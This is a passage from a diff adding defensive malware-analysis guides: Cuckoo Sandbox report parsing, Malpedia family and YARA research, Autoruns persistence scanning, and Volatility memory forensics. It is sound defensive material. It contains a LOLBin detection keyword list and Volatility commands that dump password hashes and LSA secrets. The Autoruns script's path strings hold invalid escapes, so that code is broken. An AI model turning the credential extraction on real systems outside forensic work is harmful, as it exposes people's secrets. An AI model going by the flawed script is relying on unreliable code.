||||
# HTTP requests
|
||||
print("\nHTTP Requests:")
|
||||
for http in network.get("http", []):
|
||||
print(f" {http['method']} {http['uri']} (Host: {http['host']})")
|
||||
if http.get("body"):
|
||||
print(f" Body: {http['body'][:200]}")
|
||||
|
||||
# TCP connections
|
||||
print("\nTCP Connections:")
|
||||
for tcp in network.get("tcp", []):
|
||||
print(f" {tcp['src']}:{tcp['sport']} -> {tcp['dst']}:{tcp['dport']}")
|
||||
|
||||
# Extract PCAP for deeper Wireshark analysis
|
||||
# PCAP location: /opt/cuckoo/storage/analyses/1/dump.pcap
|
||||
```
|
||||
|
||||
### Step 5: Examine File System and Registry Changes
|
||||
|
||||
Document persistence mechanisms and dropped files:
|
||||
|
||||
```python
|
||||
# File operations
|
||||
print("Files Created/Modified:")
|
||||
for f in report["behavior"].get("summary", {}).get("files", []):
|
||||
print(f" {f}")
|
||||
|
||||
# Dropped files with hashes
|
||||
print("\nDropped Files:")
|
||||
for dropped in report.get("dropped", []):
|
||||
print(f" Path: {dropped['filepath']}")
|
||||
print(f" SHA-256: {dropped['sha256']}")
|
||||
print(f" Size: {dropped['size']} bytes")
|
||||
print(f" Type: {dropped['type']}")
|
||||
|
||||
# Registry modifications
|
||||
print("\nRegistry Keys Modified:")
|
||||
for key in report["behavior"].get("summary", {}).get("keys", []):
|
||||
print(f" {key}")
|
||||
```
|
||||
|
||||
### Step 6: Review Signatures and Scoring
|
||||
|
||||
Check Cuckoo's behavioral signatures and threat scoring:
|
||||
|
||||
```python
|
||||
# Behavioral signatures triggered
|
||||
print("Triggered Signatures:")
|
||||
for sig in report.get("signatures", []):
|
||||
severity = sig["severity"]
|
||||
name = sig["name"]
|
||||
description = sig["description"]
|
||||
marker = "[!]" if severity >= 3 else "[*]"
|
||||
print(f" {marker} [{severity}/5] {name}: {description}")
|
||||
for mark in sig.get("marks", []):
|
||||
if mark.get("call"):
|
||||
print(f" API: {mark['call']['api']}")
|
||||
if mark.get("ioc"):
|
||||
print(f" IOC: {mark['ioc']}")
|
||||
|
||||
# Overall score
|
||||
score = report.get("info", {}).get("score", 0)
|
||||
print(f"\nOverall Threat Score: {score}/10")
|
||||
```
|
||||
|
||||
### Step 7: Extract Memory Dump Artifacts
|
||||
|
||||
Analyze the full memory dump captured during execution:
|
||||
|
||||
```bash
|
||||
# Memory dump is saved at:
|
||||
# /opt/cuckoo/storage/analyses/1/memory.dmp
|
||||
|
||||
# Use Volatility to analyze the memory dump
|
||||
vol3 -f /opt/cuckoo/storage/analyses/1/memory.dmp windows.pslist
|
||||
vol3 -f /opt/cuckoo/storage/analyses/1/memory.dmp windows.malfind
|
||||
vol3 -f /opt/cuckoo/storage/analyses/1/memory.dmp windows.netscan
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **Dynamic Analysis** | Executing malware in a controlled environment to observe runtime behavior including system calls, network activity, and file operations |
|
||||
| **Sandbox Evasion** | Techniques malware uses to detect virtual/sandbox environments and alter behavior to avoid analysis (sleep timers, VM checks, user interaction checks) |
|
||||
| **API Hooking** | Cuckoo's method of intercepting Windows API calls made by the malware to log function names, parameters, and return values |
|
||||
| **InetSim** | Internet services simulation tool that responds to malware network requests (HTTP, DNS, SMTP) within the isolated analysis network |
|
||||
| **Process Injection** | Malware technique of injecting code into legitimate processes; detected by monitoring VirtualAllocEx and WriteProcessMemory API sequences |
|
||||
| **Behavioral Signature** | Rule-based detection matching specific sequences of API calls, file operations, or network activity to known malware behaviors |
|
||||
| **Analysis Package** | Cuckoo module defining how to execute a specific file type (exe, dll, pdf, doc) within the guest VM for proper behavioral capture |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Cuckoo Sandbox**: Open-source automated malware analysis system providing behavioral reports, network captures, and memory dumps
|
||||
- **InetSim**: Internet services simulation suite providing fake HTTP, DNS, SMTP, and other services for isolated malware analysis networks
|
||||
- **FakeNet-NG**: FLARE team's network simulation tool that intercepts and redirects all network traffic for analysis
|
||||
- **Suricata**: Network IDS/IPS integrated with Cuckoo for real-time signature-based detection of malicious network traffic
|
||||
- **Volatility**: Memory forensics framework used to analyze memory dumps captured during Cuckoo analysis
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Analyzing a Multi-Stage Dropper
|
||||
|
||||
**Context**: Static analysis reveals a packed executable with minimal imports and high entropy. The sample needs sandbox execution to observe unpacking, payload delivery, and C2 establishment.
|
||||
|
||||
**Approach**:
|
||||
1. Submit sample to Cuckoo with extended timeout (600 seconds) to capture slow-acting behavior
|
||||
2. Review process tree for child process creation (dropper spawning payload processes)
|
||||
3. Identify dropped files in %TEMP%, %APPDATA%, or system directories
|
||||
4. Extract dropped files and compute hashes for separate analysis
|
||||
5. Map network connections to identify C2 infrastructure contacted after initial execution
|
||||
6. Check for persistence mechanisms (Run keys, scheduled tasks, services) in registry modifications
|
||||
7. Compare behavioral signatures against known malware families
|
||||
|
||||
**Pitfalls**:
|
||||
- Using insufficient analysis timeout causing the sandbox to terminate before second-stage payload executes
|
||||
- Not configuring InetSim to respond to DNS and HTTP requests, preventing the malware from progressing past C2 check-in
|
||||
- Ignoring sandbox evasion detections; if the sample exits immediately, it may be detecting the virtual environment
|
||||
- Not analyzing dropped files separately; the initial dropper may be less interesting than the final payload
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
DYNAMIC ANALYSIS REPORT - CUCKOO SANDBOX
|
||||
==========================================
|
||||
Task ID: 1547
|
||||
Sample: suspect.exe (SHA-256: e3b0c44298fc1c149afbf4c8996fb924...)
|
||||
Analysis Time: 300 seconds
|
||||
VM: win10_x64 (Windows 10 21H2)
|
||||
Score: 8.5/10
|
||||
|
||||
PROCESS TREE
|
||||
suspect.exe (PID: 2184)
|
||||
└── cmd.exe (PID: 3456)
|
||||
└── powershell.exe (PID: 4012)
|
||||
└── svchost_fake.exe (PID: 4568)
|
||||
|
||||
FILE SYSTEM ACTIVITY
|
||||
[CREATED] C:\Users\Admin\AppData\Local\Temp\payload.dll
|
||||
[CREATED] C:\Windows\System32\svchost_fake.exe
|
||||
[MODIFIED] C:\Windows\System32\drivers\etc\hosts
|
||||
|
||||
REGISTRY MODIFICATIONS
|
||||
[SET] HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\Windows\System32\svchost_fake.exe"
|
||||
[SET] HKLM\SYSTEM\CurrentControlSet\Services\FakeService\ImagePath = "C:\Windows\System32\svchost_fake.exe"
|
||||
|
||||
NETWORK ACTIVITY
|
||||
DNS: update.malicious[.]com -> 185.220.101.42
|
||||
HTTP: POST hxxps://185.220.101[.]42/gate.php (beacon)
|
||||
TCP: 10.0.2.15:49152 -> 185.220.101.42:443 (237 connections)
|
||||
|
||||
BEHAVIORAL SIGNATURES
|
||||
[!] [4/5] injection_createremotethread: Injects code into remote process
|
||||
[!] [4/5] persistence_autorun: Modifies Run registry key for persistence
|
||||
[!] [3/5] network_cnc_http: Performs HTTP C2 communication
|
||||
[*] [2/5] antiav_detectfile: Checks for antivirus product files
|
||||
|
||||
DROPPED FILES
|
||||
payload.dll SHA-256: abc123... Size: 98304 Type: PE32 DLL
|
||||
svchost_fake.exe SHA-256: def456... Size: 184320 Type: PE32 EXE
|
||||
```
|
||||
@@ -0,0 +1,259 @@
|
||||
---
|
||||
name: analyzing-malware-family-relationships-with-malpedia
|
||||
description: Use the Malpedia platform and API to research malware family relationships, track variant evolution, link families to threat actors, and integrate YARA rules for detection across malware lineages.
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [malpedia, malware-family, yara, threat-actor, malware-tracking, threat-intelligence, variant-analysis, malware-intelligence]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Malware Family Relationships with Malpedia
|
||||
|
||||
## Overview
|
||||
|
||||
Malpedia is a collaborative platform maintained by Fraunhofer FKIE that catalogs malware families with their aliases, YARA rules, threat actor associations, and reference reports. With over 2,600 malware families documented, it serves as the definitive resource for understanding malware lineages, tracking variant evolution, and linking malware to specific threat groups. This skill covers querying the Malpedia API, mapping malware family relationships, extracting YARA rules for detection, and building intelligence on malware ecosystems used by adversaries.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `requests`, `yara-python`, `stix2` libraries
|
||||
- Malpedia API key (register at https://malpedia.caad.fkie.fraunhofer.de/)
|
||||
- Understanding of malware classification and naming conventions
|
||||
- Familiarity with YARA rule syntax for detection
|
||||
- Access to malware samples for validation (optional)
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### Malpedia Data Model
|
||||
|
||||
Malpedia organizes malware into Families (e.g., "win.cobalt_strike"), each containing: aliases (vendor-specific names like "Beacon", "CobaltStrike"), YARA rules (community and vendor-contributed), actor associations (threat groups using the family), reference reports (CTI reports documenting the family), and sample hashes (representative samples for each variant).
|
||||
|
||||
### Malware Family Naming
|
||||
|
||||
Malpedia uses the format `platform.family_name` (e.g., `win.emotet`, `elf.mirai`, `apk.flubot`). Platforms include win (Windows), elf (Linux), apk (Android), osx (macOS), and py (Python). This standardized naming resolves the "many names" problem where different vendors assign different names to the same malware.
|
||||
|
||||
### Family Relationships
|
||||
|
||||
Malware families have relationships including: parent-child (code reuse, forks), loader-payload (Emotet loads TrickBot loads Ryuk), shared authorship (same threat actor develops multiple tools), and infrastructure sharing (common C2 frameworks).
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Query Malpedia API for Malware Families
|
||||
|
||||
```python
|
||||
import requests
|
||||
import json
|
||||
from collections import defaultdict
|
||||
|
||||
class MalpediaClient:
|
||||
BASE_URL = "https://malpedia.caad.fkie.fraunhofer.de/api"
|
||||
|
||||
def __init__(self, api_key):
|
||||
self.headers = {"Authorization": f"apitoken {api_key}"}
|
||||
|
||||
def get_family_list(self):
|
||||
"""Get list of all malware families."""
|
||||
resp = requests.get(f"{self.BASE_URL}/list/families",
|
||||
headers=self.headers, timeout=30)
|
||||
if resp.status_code == 200:
|
||||
families = resp.json()
|
||||
print(f"[+] Malpedia: {len(families)} malware families")
|
||||
return families
|
||||
return {}
|
||||
|
||||
def get_family_info(self, family_name):
|
||||
"""Get detailed information about a malware family."""
|
||||
resp = requests.get(f"{self.BASE_URL}/get/family/{family_name}",
|
||||
headers=self.headers, timeout=30)
|
||||
if resp.status_code == 200:
|
||||
info = resp.json()
|
||||
print(f"[+] Family: {family_name}")
|
||||
print(f" Aliases: {info.get('alt_names', [])}")
|
||||
print(f" Actors: {[a.get('value', '') for a in info.get('attribution', [])]}")
|
||||
print(f" URLs: {len(info.get('urls', []))} references")
|
||||
return info
|
||||
print(f"[-] Family not found: {family_name}")
|
||||
return None
|
||||
|
||||
def get_family_yara(self, family_name):
|
||||
"""Get YARA rules for a malware family."""
|
||||
resp = requests.get(f"{self.BASE_URL}/get/yara/{family_name}",
|
||||
headers=self.headers, timeout=30)
|
||||
if resp.status_code == 200:
|
||||
rules = resp.json()
|
||||
rule_count = sum(len(v) for v in rules.values()) if isinstance(rules, dict) else 0
|
||||
print(f"[+] YARA rules for {family_name}: {rule_count} rules")
|
||||
return rules
|
||||
return {}
|
||||
|
||||
def get_actor_families(self, actor_name):
|
||||
"""Get malware families associated with a threat actor."""
|
||||
resp = requests.get(f"{self.BASE_URL}/get/actor/{actor_name}",
|
||||
headers=self.headers, timeout=30)
|
||||
if resp.status_code == 200:
|
||||
data = resp.json()
|
||||
families = data.get("families", {})
|
||||
print(f"[+] {actor_name}: {len(families)} malware families")
|
||||
return data
|
||||
return {}
|
||||
|
||||
def search_families(self, keyword):
|
||||
"""Search families by keyword."""
|
||||
all_families = self.get_family_list()
|
||||
matches = {
|
||||
name: info for name, info in all_families.items()
|
||||
if keyword.lower() in name.lower()
|
||||
or keyword.lower() in str(info.get("alt_names", [])).lower()
|
||||
}
|
||||
print(f"[+] Search '{keyword}': {len(matches)} matches")
|
||||
return matches
|
||||
|
||||
client = MalpediaClient("YOUR_MALPEDIA_API_KEY")
|
||||
families = client.get_family_list()
|
||||
emotet_info = client.get_family_info("win.emotet")
|
||||
```
|
||||
|
||||
### Step 2: Map Malware Family Relationships
|
||||
|
||||
```python
|
||||
class MalwareFamilyMapper:
|
||||
def __init__(self, malpedia_client):
|
||||
self.client = malpedia_client
|
||||
self.relationship_graph = defaultdict(list)
|
||||
|
||||
def map_actor_ecosystem(self, actor_name):
|
||||
"""Map the malware ecosystem used by a threat actor."""
|
||||
actor_data = self.client.get_actor_families(actor_name)
|
||||
families = actor_data.get("families", {})
|
||||
|
||||
ecosystem = {
|
||||
"actor": actor_name,
|
||||
"families": [],
|
||||
"family_count": len(families),
|
||||
}
|
||||
|
||||
for family_name in families:
|
||||
info = self.client.get_family_info(family_name)
|
||||
if info:
|
||||
ecosystem["families"].append({
|
||||
"name": family_name,
|
||||
"aliases": info.get("alt_names", []),
|
||||
"description": info.get("description", "")[:200],
|
||||
"shared_actors": [
|
||||
a.get("value", "")
|
||||
for a in info.get("attribution", [])
|
||||
],
|
||||
"reference_count": len(info.get("urls", [])),
|
||||
})
|
||||
|
||||
print(f"\n=== {actor_name} Malware Ecosystem ===")
|
||||
for fam in ecosystem["families"]:
|
||||
shared = [a for a in fam["shared_actors"] if a != actor_name]
|
||||
print(f" {fam['name']}")
|
||||
print(f" Aliases: {fam['aliases'][:5]}")
|
||||
if shared:
|
||||
print(f" Also used by: {shared}")
|
||||
|
||||
return ecosystem
|
||||
|
||||
def find_shared_tooling(self, actor_names):
|
||||
"""Find malware families shared between threat actors."""
|
||||
actor_families = {}
|
||||
for actor in actor_names:
|
||||
data = self.client.get_actor_families(actor)
|
||||
actor_families[actor] = set(data.get("families", {}).keys())
|
||||
|
||||
# Find overlaps
|
||||
shared = {}
|
||||
for i, actor1 in enumerate(actor_names):
|
||||
for actor2 in actor_names[i+1:]:
|
||||
common = actor_families[actor1] & actor_families[actor2]
|
||||
if common:
|
||||
shared[f"{actor1} <-> {actor2}"] = sorted(common)
|
||||
|
||||
print(f"\n=== Shared Tooling Analysis ===")
|
||||
for pair, families in shared.items():
|
||||
print(f" {pair}: {len(families)} shared families")
|
||||
for f in families[:5]:
|
||||
print(f" - {f}")
|
||||
|
||||
return shared
|
||||
|
||||
def build_loader_payload_chain(self, family_name):
|
||||
"""Build the loader-payload delivery chain for a family."""
|
||||
info = self.client.get_family_info(family_name)
|
||||
if not info:
|
||||
return {}
|
||||
|
||||
chain = {
|
||||
"family": family_name,
|
||||
"description": info.get("description", ""),
|
||||
"known_loaders": [],
|
||||
"known_payloads": [],
|
||||
}
|
||||
|
||||
# Common known delivery chains
|
||||
known_chains = {
|
||||
"win.emotet": {"loaders": ["email/macro"], "payloads": ["win.trickbot", "win.qakbot", "win.cobalt_strike"]},
|
||||
"win.trickbot": {"loaders": ["win.emotet"], "payloads": ["win.ryuk", "win.conti", "win.cobalt_strike"]},
|
||||
"win.qakbot": {"loaders": ["email/macro", "win.emotet"], "payloads": ["win.cobalt_strike", "win.blackbasta"]},
|
||||
"win.cobalt_strike": {"loaders": ["win.emotet", "win.trickbot", "win.qakbot"], "payloads": ["ransomware"]},
|
||||
}
|
||||
|
||||
if family_name in known_chains:
|
||||
chain["known_loaders"] = known_chains[family_name]["loaders"]
|
||||
chain["known_payloads"] = known_chains[family_name]["payloads"]
|
||||
|
||||
return chain
|
||||
|
||||
mapper = MalwareFamilyMapper(client)
|
||||
ecosystem = mapper.map_actor_ecosystem("Wizard Spider")
|
||||
shared = mapper.find_shared_tooling(["Wizard Spider", "FIN7", "Lazarus Group"])
|
||||
chain = mapper.build_loader_payload_chain("win.emotet")
|
||||
```
|
||||
|
||||
### Step 3: Extract and Compile YARA Rules
|
||||
|
||||
```python
|
||||
def compile_yara_ruleset(client, family_names, output_file="malware_yara_rules.yar"):
|
||||
"""Compile YARA rules for multiple malware families."""
|
||||
all_rules = []
|
||||
for family in family_names:
|
||||
yara_data = client.get_family_yara(family)
|
||||
if isinstance(yara_data, dict):
|
||||
for source, rules in yara_data.items():
|
||||
if isinstance(rules, list):
|
||||
for rule in rules:
|
||||
all_rules.append(f"// Source: {source} - Family: {family}\n{rule}")
|
||||
elif isinstance(rules, str):
|
||||
all_rules.append(f"// Source: {source} - Family: {family}\n{rules}")
|
||||
|
||||
with open(output_file, "w") as f:
|
||||
f.write(f"// Malpedia YARA Rules - {len(all_rules)} rules\n")
|
||||
f.write(f"// Families: {', '.join(family_names)}\n\n")
|
||||
for rule in all_rules:
|
||||
f.write(rule + "\n\n")
|
||||
|
||||
print(f"[+] Compiled {len(all_rules)} YARA rules to {output_file}")
|
||||
return all_rules
|
||||
|
||||
compile_yara_ruleset(client, ["win.emotet", "win.trickbot", "win.cobalt_strike"])
|
||||
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- Malpedia API queried successfully for malware families
|
||||
- Family information retrieved with aliases, actors, and references
|
||||
- Actor-family relationships mapped correctly
|
||||
- Shared tooling between actors identified
|
||||
- YARA rules extracted and compiled for detection
|
||||
- Loader-payload chains documented for threat intelligence
|
||||
|
||||
## References
|
||||
|
||||
- [Malpedia Platform](https://malpedia.caad.fkie.fraunhofer.de/)
|
||||
- [Malpedia API Documentation](https://malpedia.caad.fkie.fraunhofer.de/usage/api)
|
||||
- [Malpedia Research Paper](https://www.botconf.eu/wp-content/uploads/formidable/2/2017-DanielPlohmann-Malpedia.pdf)
|
||||
- [YARA Rules Project](https://github.com/Yara-Rules/rules)
|
||||
- [malwoverview Multi-Platform Tool](https://github.com/alexandreborges/malwoverview)
|
||||
- [CyberAtlas: Malpedia Integration](https://www.cyberatlas.io/malpedia)
|
||||
@@ -0,0 +1,92 @@
|
||||
---
|
||||
name: analyzing-malware-persistence-with-autoruns
|
||||
description: Use Sysinternals Autoruns to systematically identify and analyze malware persistence mechanisms across registry keys, scheduled tasks, services, drivers, and startup locations on Windows systems.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [autoruns, persistence, malware-analysis, sysinternals, windows, registry, startup, incident-response]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Malware Persistence with Autoruns
|
||||
|
||||
## Overview
|
||||
|
||||
Sysinternals Autoruns extracts data from hundreds of Auto-Start Extensibility Points (ASEPs) on Windows, scanning 18+ categories including Run/RunOnce keys, services, scheduled tasks, drivers, Winlogon entries, LSA providers, print monitors, WMI subscriptions, and AppInit DLLs. Digital signature verification filters Microsoft-signed entries. The compare function identifies newly added persistence via baseline diffing. VirusTotal integration checks hash reputation. Offline analysis via -z flag enables forensic disk image examination.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Sysinternals Autoruns (GUI) and Autorunsc (CLI)
|
||||
- Administrative privileges on target system
|
||||
- Python 3.9+ for automated analysis
|
||||
- VirusTotal API key for reputation checks
|
||||
- Clean baseline export for comparison
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Automated Persistence Scanning
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
"""Automate Autoruns-based persistence analysis."""
|
||||
import subprocess
|
||||
import csv
|
||||
import json
|
||||
import sys
|
||||
|
||||
|
||||
def scan_and_analyze(autorunsc_path="autorunsc64.exe", csv_path="scan.csv"):
|
||||
cmd = [autorunsc_path, "-a", "*", "-c", "-h", "-s", "-nobanner", "*"]
|
||||
result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
|
||||
with open(csv_path, 'w') as f:
|
||||
f.write(result.stdout)
|
||||
return parse_and_flag(csv_path)
|
||||
|
||||
|
||||
def parse_and_flag(csv_path):
|
||||
suspicious = []
|
||||
with open(csv_path, 'r', errors='replace') as f:
|
||||
for row in csv.DictReader(f):
|
||||
reasons = []
|
||||
signer = row.get("Signer", "")
|
||||
if not signer or signer == "(Not verified)":
|
||||
reasons.append("Unsigned binary")
|
||||
if not row.get("Description") and not row.get("Company"):
|
||||
reasons.append("Missing metadata")
|
||||
path = row.get("Image Path", "").lower()
|
||||
for sp in ["\temp\\", "\appdata\local\temp", "\users\public\\"]:
|
||||
if sp in path:
|
||||
reasons.append(f"Suspicious path")
|
||||
launch = row.get("Launch String", "").lower()
|
||||
for kw in ["powershell", "cmd /c", "wscript", "mshta", "regsvr32"]:
|
||||
if kw in launch:
|
||||
reasons.append(f"LOLBin: {kw}")
|
||||
if reasons:
|
||||
row["reasons"] = reasons
|
||||
suspicious.append(row)
|
||||
return suspicious
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
if len(sys.argv) > 1:
|
||||
results = parse_and_flag(sys.argv[1])
|
||||
print(f"[!] {len(results)} suspicious entries")
|
||||
for r in results:
|
||||
print(f" {r.get('Entry','')} - {r.get('Image Path','')}")
|
||||
for reason in r.get('reasons', []):
|
||||
print(f" - {reason}")
|
||||
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- All ASEP categories scanned and cataloged
|
||||
- Unsigned entries flagged for investigation
|
||||
- Suspicious paths and LOLBin launch strings highlighted
|
||||
- Baseline comparison identifies new persistence mechanisms
|
||||
|
||||
## References
|
||||
|
||||
- [Sysinternals Autoruns](https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns)
|
||||
- [SANS - Offline Autoruns Revisited](https://www.sans.org/blog/offline-autoruns-revisited-auditing-malware-persistence/)
|
||||
- [Hunting Malware with Autoruns](https://nasbench.medium.com/hunting-malware-with-windows-sysinternals-autoruns-19cbfe4103c2)
|
||||
- [MITRE ATT&CK T1547 - Boot or Logon Autostart](https://attack.mitre.org/techniques/T1547/)
|
||||
@@ -0,0 +1,25 @@
|
||||
# Analysis Report Template - analyzing-malware-persistence-with-autoruns
|
||||
|
||||
## Sample Information
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| SHA-256 | |
|
||||
| File Type | |
|
||||
| Analysis Date | |
|
||||
| Analyst | |
|
||||
| Classification | TLP:AMBER |
|
||||
|
||||
## Findings
|
||||
| Finding | Severity | Details |
|
||||
|---------|----------|---------|
|
||||
| | | |
|
||||
|
||||
## IOCs Extracted
|
||||
| Type | Value | Context |
|
||||
|------|-------|---------|
|
||||
| | | |
|
||||
|
||||
## Recommendations
|
||||
1.
|
||||
2.
|
||||
3.
|
||||
@@ -0,0 +1,9 @@
|
||||
# Standards Reference - analyzing-malware-persistence-with-autoruns
|
||||
|
||||
## Applicable Standards
|
||||
- MITRE ATT&CK Framework
|
||||
- NIST SP 800-83 Guide to Malware Incident Prevention
|
||||
- NIST SP 800-86 Guide to Integrating Forensic Techniques
|
||||
|
||||
## Related MITRE ATT&CK Techniques
|
||||
See SKILL.md for specific technique mappings.
|
||||
@@ -0,0 +1,11 @@
|
||||
# Analysis Workflows - analyzing-malware-persistence-with-autoruns
|
||||
|
||||
## Primary Workflow
|
||||
```
|
||||
[Sample Collection] --> [Static Analysis] --> [Dynamic Analysis] --> [IOC Extraction]
|
||||
|
|
||||
v
|
||||
[Report Generation]
|
||||
```
|
||||
|
||||
See SKILL.md for detailed step-by-step procedures.
|
||||
@@ -0,0 +1,298 @@
|
||||
---
|
||||
name: analyzing-memory-dumps-with-volatility
|
||||
description: >
|
||||
Analyzes RAM memory dumps from compromised systems using the Volatility framework to
|
||||
identify malicious processes, injected code, network connections, loaded modules, and
|
||||
extracted credentials. Supports Windows, Linux, and macOS memory forensics. Activates
|
||||
for requests involving memory forensics, RAM analysis, volatile data examination,
|
||||
process injection detection, or memory-resident malware investigation.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, memory-forensics, Volatility, RAM-analysis, incident-response]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Memory Dumps with Volatility
|
||||
|
||||
## When to Use
|
||||
|
||||
- A compromised system's RAM has been captured and needs forensic analysis for malware artifacts
|
||||
- Detecting fileless malware that exists only in memory without persistent disk artifacts
|
||||
- Extracting encryption keys, passwords, or decrypted configuration from process memory
|
||||
- Identifying process injection, DLL injection, or process hollowing in a compromised system
|
||||
- Analyzing rootkit activity that hides from standard disk-based forensic tools
|
||||
|
||||
**Do not use** for disk image analysis; use Autopsy, FTK, or Sleuth Kit for disk forensics.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Volatility 3 installed (`pip install volatility3`) with symbol tables for target OS
|
||||
- Memory dump file acquired from the target system (using WinPmem, LiME, or DumpIt)
|
||||
- Knowledge of the source OS version for correct profile/symbol selection
|
||||
- Sufficient disk space (memory dumps can be 4-64 GB)
|
||||
- YARA rules for scanning memory for known malware signatures
|
||||
- Strings utility for extracting readable strings from memory regions
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Identify the Memory Dump Profile
|
||||
|
||||
Determine the operating system and version from the memory dump:
|
||||
|
||||
```bash
|
||||
# Volatility 3: Automatic OS detection
|
||||
vol3 -f memory.dmp windows.info
|
||||
|
||||
# List available plugins
|
||||
vol3 -f memory.dmp --help
|
||||
|
||||
# If symbols are needed, download from:
|
||||
# https://downloads.volatilityfoundation.org/volatility3/symbols/
|
||||
|
||||
# For Volatility 2 (legacy):
|
||||
vol2 -f memory.dmp imageinfo
|
||||
vol2 -f memory.dmp kdbgscan
|
||||
```
|
||||
|
||||
### Step 2: Enumerate Running Processes
|
||||
|
||||
List all processes and identify suspicious entries:
|
||||
|
||||
```bash
|
||||
# List all processes
|
||||
vol3 -f memory.dmp windows.pslist
|
||||
|
||||
# Process tree (parent-child relationships)
|
||||
vol3 -f memory.dmp windows.pstree
|
||||
|
||||
# Scan for hidden/unlinked processes (rootkit detection)
|
||||
vol3 -f memory.dmp windows.psscan
|
||||
|
||||
# Compare pslist vs psscan to find hidden processes
|
||||
# Processes in psscan but not pslist are potentially hidden by rootkits
|
||||
|
||||
# Check for process hollowing
|
||||
vol3 -f memory.dmp windows.pslist --dump
|
||||
# Then verify the dumped EXE matches the expected binary on disk
|
||||
```
|
||||
|
||||
```
|
||||
Suspicious Process Indicators:
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
- svchost.exe not spawned by services.exe (wrong parent)
|
||||
- csrss.exe/lsass.exe with unusual parent process
|
||||
- Multiple instances of lsass.exe (should be only one)
|
||||
- Processes with misspelled names (scvhost.exe, lssas.exe)
|
||||
- cmd.exe or powershell.exe spawned by WINWORD.EXE or browser
|
||||
- Processes running from unusual paths (%TEMP%, %APPDATA%)
|
||||
- Processes with no parent (orphaned - parent terminated)
|
||||
```
|
||||
|
||||
### Step 3: Detect Malicious Code Injection
|
||||
|
||||
Scan for injected code and process hollowing:
|
||||
|
||||
```bash
|
||||
# Detect injected code in processes (malfind)
|
||||
vol3 -f memory.dmp windows.malfind
|
||||
|
||||
# Malfind looks for:
|
||||
# - Memory regions with PAGE_EXECUTE_READWRITE protection
|
||||
# - Memory regions containing PE headers (MZ/PE signature)
|
||||
# - VAD (Virtual Address Descriptor) anomalies
|
||||
|
||||
# Dump injected memory regions for analysis
|
||||
vol3 -f memory.dmp windows.malfind --dump --pid 2184
|
||||
|
||||
# List loaded DLLs per process
|
||||
vol3 -f memory.dmp windows.dlllist --pid 2184
|
||||
|
||||
# Detect hollowed processes by comparing mapped image to disk
|
||||
vol3 -f memory.dmp windows.hollowfind
|
||||
|
||||
# Scan for loaded drivers (potential rootkit drivers)
|
||||
vol3 -f memory.dmp windows.driverscan
|
||||
|
||||
# List kernel modules
|
||||
vol3 -f memory.dmp windows.modules
|
||||
```
|
||||
|
||||
### Step 4: Analyze Network Connections
|
||||
|
||||
Extract active and closed network connections:
|
||||
|
||||
```bash
|
||||
# List all network connections (active and listening)
|
||||
vol3 -f memory.dmp windows.netscan
|
||||
|
||||
# Output columns: Offset, Protocol, LocalAddr, LocalPort, ForeignAddr, ForeignPort, State, PID, Owner
|
||||
|
||||
# Filter for established connections to external IPs
|
||||
vol3 -f memory.dmp windows.netscan | grep ESTABLISHED
|
||||
|
||||
# For older Windows (XP/2003):
|
||||
vol3 -f memory.dmp windows.netstat
|
||||
|
||||
# Cross-reference PIDs with process list
|
||||
# Suspicious: svchost.exe connected to external IP on non-standard port
|
||||
# Suspicious: notepad.exe or calc.exe with network connections
|
||||
```
|
||||
|
||||
### Step 5: Extract Artifacts and Credentials
|
||||
|
||||
Recover sensitive data from memory:
|
||||
|
||||
```bash
|
||||
# Dump process memory for a specific PID
|
||||
vol3 -f memory.dmp windows.memmap --dump --pid 2184
|
||||
|
||||
# Extract command-line history
|
||||
vol3 -f memory.dmp windows.cmdline
|
||||
|
||||
# Extract environment variables
|
||||
vol3 -f memory.dmp windows.envars --pid 2184
|
||||
|
||||
# Registry analysis (extract Run keys for persistence)
|
||||
vol3 -f memory.dmp windows.registry.printkey \
|
||||
--key "Software\Microsoft\Windows\CurrentVersion\Run"
|
||||
|
||||
# Extract hashed/cached credentials
|
||||
vol3 -f memory.dmp windows.hashdump
|
||||
vol3 -f memory.dmp windows.cachedump
|
||||
vol3 -f memory.dmp windows.lsadump
|
||||
|
||||
# Extract clipboard contents
|
||||
vol3 -f memory.dmp windows.clipboard
|
||||
|
||||
# File extraction from memory
|
||||
vol3 -f memory.dmp windows.filescan | grep -i "payload\|malware\|suspicious"
|
||||
vol3 -f memory.dmp windows.dumpfiles --virtaddr 0xFA8001234560
|
||||
```
|
||||
|
||||
### Step 6: Scan Memory with YARA Rules
|
||||
|
||||
Apply YARA signatures to detect known malware in memory:
|
||||
|
||||
```bash
|
||||
# Scan entire memory dump with YARA rules
|
||||
vol3 -f memory.dmp yarascan.YaraScan --yara-file malware_rules.yar
|
||||
|
||||
# Scan specific process memory
|
||||
